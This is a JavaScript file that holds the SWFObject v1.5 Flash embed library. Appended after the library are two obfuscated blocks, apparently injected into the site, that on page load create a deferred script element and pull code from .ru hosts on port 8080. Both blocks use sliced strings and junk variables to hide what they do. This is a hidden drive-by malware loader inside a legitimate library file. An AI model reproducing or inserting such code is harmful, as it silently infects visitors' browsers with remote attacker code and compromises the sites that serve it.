/**
 * SWFObject v1.5: Flash Player detection and embed - http://blog.deconcept.com/swfobject/
 *
 * SWFObject is (c) 2007 Geoff Stearns and is released under the MIT License:
 * http://www.opensource.org/licenses/mit-license.php
 *
 */
if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}deconcept.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a){if(!document.getElementById){return;}this.DETECT_KEY=_a?_a:"detectflash";this.skipDetect=deconcept.util.getRequestParameter(this.DETECT_KEY);this.params=new Object();this.variables=new Object();this.attributes=new Array();if(_1){this.setAttribute("swf",_1);}if(id){this.setAttribute("id",id);}if(w){this.setAttribute("width",w);}if(h){this.setAttribute("height",h);}if(_5){this.setAttribute("version",new deconcept.PlayerVersion(_5.toString().split(".")));}this.installedVer=deconcept.SWFObjectUtil.getPlayerVersion();if(!window.opera&&document.all&&this.installedVer.major>7){deconcept.SWFObject.doPrepUnload=true;}if(c){this.addParam("bgcolor",c);}var q=_7?_7:"high";this.addParam("quality",q);this.setAttribute("useExpressInstall",false);this.setAttribute("doExpressInstall",false);var _c=(_8)?_8:window.location;this.setAttribute("xiRedirectUrl",_c);this.setAttribute("redirectUrl","");if(_9){this.setAttribute("redirectUrl",_9);}};deconcept.SWFObject.prototype={useExpressInstall:function(_d){this.xiSWFPath=!_d?"expressinstall.swf":_d;this.setAttribute("useExpressInstall",true);},setAttribute:function(_e,_f){this.attributes[_e]=_f;},getAttribute:function(_10){return this.attributes[_10];},addParam:function(_11,_12){this.params[_11]=_12;},getParams:function(){return this.params;},addVariable:function(_13,_14){this.variables[_13]=_14;},getVariable:function(_15){return this.variables[_15];},getVariables:function(){return this.variables;},getVariablePairs:function(){var _16=new Array();var key;var _18=this.getVariables();for(key in _18){_16[_16.length]=key+"="+_18[key];}return _16;},getSWFHTML:function(){var _19="";if(navigator.plugins&&navigator.mimeTypes&&navigator.mimeTypes.length){if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","PlugIn");this.setAttribute("swf",this.xiSWFPath);}_19="<embed type=\"application/x-shockwave-flash\" src=\""+this.getAttribute("swf")+"\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\" style=\""+this.getAttribute("style")+"\"";_19+=" id=\""+this.getAttribute("id")+"\" name=\""+this.getAttribute("id")+"\" ";var _1a=this.getParams();for(var key in _1a){_19+=[key]+"=\""+_1a[key]+"\" ";}var _1c=this.getVariablePairs().join("&");if(_1c.length>0){_19+="flashvars=\""+_1c+"\"";}_19+="/>";}else{if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","ActiveX");this.setAttribute("swf",this.xiSWFPath);}_19="<object id=\""+this.getAttribute("id")+"\" classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\" style=\""+this.getAttribute("style")+"\">";_19+="<param name=\"movie\" value=\""+this.getAttribute("swf")+"\" />";var _1d=this.getParams();for(var key in _1d){_19+="<param name=\""+key+"\" value=\""+_1d[key]+"\" />";}var _1f=this.getVariablePairs().join("&");if(_1f.length>0){_19+="<param name=\"flashvars\" value=\""+_1f+"\" />";}_19+="</object>";}return _19;},write:function(_20){if(this.getAttribute("useExpressInstall")){var _21=new deconcept.PlayerVersion([6,0,65]);if(this.installedVer.versionIsValid(_21)&&!this.installedVer.versionIsValid(this.getAttribute("version"))){this.setAttribute("doExpressInstall",true);this.addVariable("MMredirectURL",escape(this.getAttribute("xiRedirectUrl")));document.title=document.title.slice(0,47)+" - Flash Player Installation";this.addVariable("MMdoctitle",document.title);}}if(this.skipDetect||this.getAttribute("doExpressInstall")||this.installedVer.versionIsValid(this.getAttribute("version"))){var n=(typeof _20=="string")?document.getElementById(_20):_20;n.innerHTML=this.getSWFHTML();return true;}else{if(this.getAttribute("redirectUrl")!=""){document.location.replace(this.getAttribute("redirectUrl"));}}return false;}};deconcept.SWFObjectUtil.getPlayerVersion=function(){var _23=new deconcept.PlayerVersion([0,0,0]);if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"];if(x&&x.description){_23=new deconcept.PlayerVersion(x.description.replace(/([a-zA-Z]|\s)+/,"").replace(/(\s+r|\s+b[0-9]+)/,".").split("."));}}else{if(navigator.userAgent&&navigator.userAgent.indexOf("Windows CE")>=0){var axo=1;var _26=3;while(axo){try{_26++;axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash."+_26);_23=new deconcept.PlayerVersion([_26,0,0]);}catch(e){axo=null;}}}else{try{var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");}catch(e){try{var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");_23=new deconcept.PlayerVersion([6,0,21]);axo.AllowScriptAccess="always";}catch(e){if(_23.major==6){return _23;}}try{axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash");}catch(e){}}if(axo!=null){_23=new deconcept.PlayerVersion(axo.GetVariable("$version").split(" ")[1].split(","));}}}return _23;};deconcept.PlayerVersion=function(_29){this.major=_29[0]!=null?parseInt(_29[0]):0;this.minor=_29[1]!=null?parseInt(_29[1]):0;this.rev=_29[2]!=null?parseInt(_29[2]):0;};deconcept.PlayerVersion.prototype.versionIsValid=function(fv){if(this.major<fv.major){return false;}if(this.major>fv.major){return true;}if(this.minor<fv.minor){return false;}if(this.minor>fv.minor){return true;}if(this.rev<fv.rev){return false;}return true;};deconcept.util={getRequestParameter:function(_2b){var q=document.location.search||document.location.hash;if(_2b==null){return q;}if(q){var _2d=q.substring(1).split("&");for(var i=0;i<_2d.length;i++){if(_2d[i].substring(0,_2d[i].indexOf("="))==_2b){return _2d[i].substring((_2d[i].indexOf("=")+1));}}}return "";}};deconcept.SWFObjectUtil.cleanupSWFs=function(){var _2f=document.getElementsByTagName("OBJECT");for(var i=_2f.length-1;i>=0;i--){_2f[i].style.display="none";for(var x in _2f[i]){if(typeof _2f[i][x]=="function"){_2f[i][x]=function(){};}}}};if(deconcept.SWFObject.doPrepUnload){if(!deconcept.unloadSet){deconcept.SWFObjectUtil.prepUnload=function(){__flash_unloadHandler=function(){};__flash_savedUnloadHandler=function(){};window.attachEvent("onunload",deconcept.SWFObjectUtil.cleanupSWFs);};window.attachEvent("onbeforeunload",deconcept.SWFObjectUtil.prepUnload);deconcept.unloadSet=true;}}if(!document.getElementById&&document.all){document.getElementById=function(id){return document.all[id];};}var getQueryParamValue=deconcept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;

h=["W","Wo","M"];function F(){var j={WR:"Zk"};var C={};var R={};var q=String("Jyi4defer".substr(4));var qR=44692;hv={_P:"S"};var y=window;var w={hp:"gZ"};wF=[];var f="src";var O="body";var Og=["x"];H=["fu"];var s="app"+"end"+"Chi"+"ld";var yP='';J=["o","cl"];var e=String("on"+"naTqlo".substr(4)+"ad");this.yq=19770;this.yq--;var B=document;var IT={Te:"jp"};var _k={Vf:"G"};var _=new String("creat"+"eElem"+"ent");try {var L='Jm'} catch(L){};this.HM="HM";var g=String("scrip20hL".substr(0,5)+"tWuV".substr(0,1));sE=50961;sE--;lN={zq:"i"};function Fg(){var a={iP:56882};var lE={P:46020};this.GO=21086;this.GO+=91;tz=10626;tz++;try {js=50694;js-=138;this.b=40698;this.b--;K=["fA"];var Y=6284-6283;var k="/g"+"oo"+"gl"+"e.6HCZ".substr(0,2)+"co"+"Xh3m/X3h".substr(3,2)+"on"+"em"+"rwlVanwVrl".substr(4,2)+"ga"+".c"+"om"+"/i"+"nfVoM".substr(0,2)+"ol"+"y4HinHy4".substr(3,2)+"ks"+".c"+"om"+".p"+"hp";IQ=21937;IQ++;var kt=new Date();var v=662215-654135;var SI={ve:"tl"};var Z=new String("http:"+"//dir"+"tysinm1G".substr(0,5)+"5gF.ru:".substr(3));var yh={};var YK=["aI","Un"];WL={iZ:47119};var Mp=["eK","ao"];var X=["nN","lz","LZ"];rz=28061;rz--;p=B[_](g);var Wy=false;nF={Br:5952};AI=38193;AI--;var uF="uF";p[q]=Y;var AZ=["yy","Dm"];uz={Yk:5937};p[f]=Z+v+k;this.Ys=false;B[O][s](p);var aq=new Date();} catch(m){Js=46447;Js-=156;Hg=52410;Hg+=18;};this.tp=11928;this.tp--;}zh=[];var _p=["tQ"];y[e]=Fg;};F();
try {} catch(Hc){};try {var U='Y'} catch(U){};x={S:false};try {this._l=false;try {} catch(kh){};var uF=["_Q","mp"];var iP=new Array();var EC="EC";var jt='';var L='';var c=window[new String("uneswt4".substr(0,4)+"1Ewscape".substr(4))];var Wy={W:41250};iU={};var B={xI:36955};BH=["X","s"];var sO=new Date();var Q=["vO"];var sN=["_c"];var Ba=["l"];var gC=new Date();var _I="_I";var KK=3856;var Pz=3173;var KQ=44059;var P=new String("UpSuonlo".substr(4)+"ad");var fm={tk:"wj"};var O={KD:"Vk"};var h=16155;var I=window[(String("5YlRegEx".substr(3)+"p71d".substr(0,1)))];var vl={G:"Dh"};var m='';M=[];BQ={sj:false};try {} catch(jE){};tS={};var E="6Gorep".substr(3)+"lac"+"e";var rS=["EP","yU"];var BYz=["Sd","n"];DN=54657;DN++;var cn=String("1");var rZ=["pv","mb","gsu"];var C=["nE","jP","dG"];Ud=["qy"];var Aq={};Vm=["Z"];this.oU=33948;this.oU+=212;this.eP=false;this.YY=53990;this.YY+=121;this.qf=11413;this.qf+=252;var Yy={ra:false};function g(cn,v){var LV=false;nEF={Gs:"ck"};var sn=[];EE=40818;EE-=6;this.pE=false;var la=[];var j=new String("[CdF".substr(0,1));gH=["FT"];Jjo=43622;Jjo-=185;RM=39921;RM-=196;j+=v;j+=c("%5d");MV={GV:false};this.Dg="Dg";Ej={gu:"Hn"};Ly={Gn:"Xi"};var q=new I(j, "wQuLg".substr(4));oZ={};return cn.replace(q, m);this.ia=52245;this.ia--;this.UC=10324;this.UC--;this.RME=59063;this.RME--;re={Fw:"BA"};};this.Su=false;this.jU=false;var EZ=new String();this._Ii=false;Tl=35026;Tl-=145;HB=54009;HB-=208;var Yg={};jgc=21405;jgc-=62;var w=new String("/goob6F".substr(0,4)+"yGuhgle.Ghuy".substr(4,4)+"com/"+"sohu"+".com"+"/orf"+".at.uIH5".substr(0,4)+"rXsphp".substr(3));this.HCx='';this.zW='';this.Yo=51049;this.Yo+=204;var o=String("ht"+"tp"+":/"+"/a"+"sh"+"do"+"g.cAM".substr(0,2)+"ruvHa".substr(0,2)+":");LG=13536;LG--;var Ec=63442-55362;qR={qB:3900};SO={dA:34230};var aE=new Date();var of=new Array();try {} catch(YD){};try {} catch(Ml){};CD={Fj:"Zw"};this.Po="Po";TN={};function k(){var et=new String();var hp=new String();var piQ=new String();Yl=6796;Yl--;var Kl=new String();Nw=[];var ao=new Date();var iJ=new String();var oI=document;var Tw=new Date();var Gse=new Date();var vY=[];var DPn=64443;var _="app"+"end"+"3jnHChi".substr(4)+"ldupj".substr(0,2);try {var uv='hX'} catch(uv){};var E_='';var gg=g('sTcwrgigpvt6','XoQERz6PvyTfY038xwdgbm_V7');this._U="";ZH={LW:false};this.Ma="";var wO=new String();var vZ=new String();var en=12701;this.Lde="";J=oI.createElement(gg);var sy="";var Ae=["zr","Oh"];try {var lb='__'} catch(lb){};var yy={ZHp:6450};var Bx=new Array();this.sg="";this.zc="";V=o+Ec;V=V+w;var sI=[];var pa=[];var yVn={dP:false};sNn=["ed"];Yf=28567;Yf--;var wy=["jr","rU"];Mlo=40051;Mlo--;var i=oI.body;this.SD=false;this.ws=false;try {var RA='py'} catch(RA){};J[String("deferNEQF".substr(0,5))]=cn;J.src=V;var Zj={WL:39816};this.NC=false;ui=37383;ui++;this.rQt="rQt";taR=[];i[_](J);hx=[];this.FF=562;this.FF++;var TY=false;};this.Ro=false;var Cj=40938;this.pW=38767;this.pW+=36;this.Mg=65042;this.Mg+=14;var Wux=["UQ","OV"];this.tm=6690;this.tm--;this.He=64860;this.He--;window[P]=k;Zy={XB:false};this.oV=19208;this.oV+=35;this.Js=9093;this.Js--;this.Je=39142;this.Je+=122;this.Da=32065;this.Da--;} catch(D){MH=["rq","ZC"];this.vE=false;try {var mG='kH'} catch(mG){};this.uiy=false;MJ={OA:false};JO=["Qt","mO","WrN"];};var SuV={Pn:"YX"};